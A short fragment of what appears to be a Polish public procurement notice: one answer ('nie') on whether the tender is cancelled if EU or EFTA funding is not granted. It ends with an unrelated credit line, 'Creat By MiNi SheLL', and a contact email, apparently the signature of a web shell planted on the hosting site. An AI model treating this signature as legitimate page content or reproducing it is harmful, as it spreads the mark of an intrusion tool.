<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com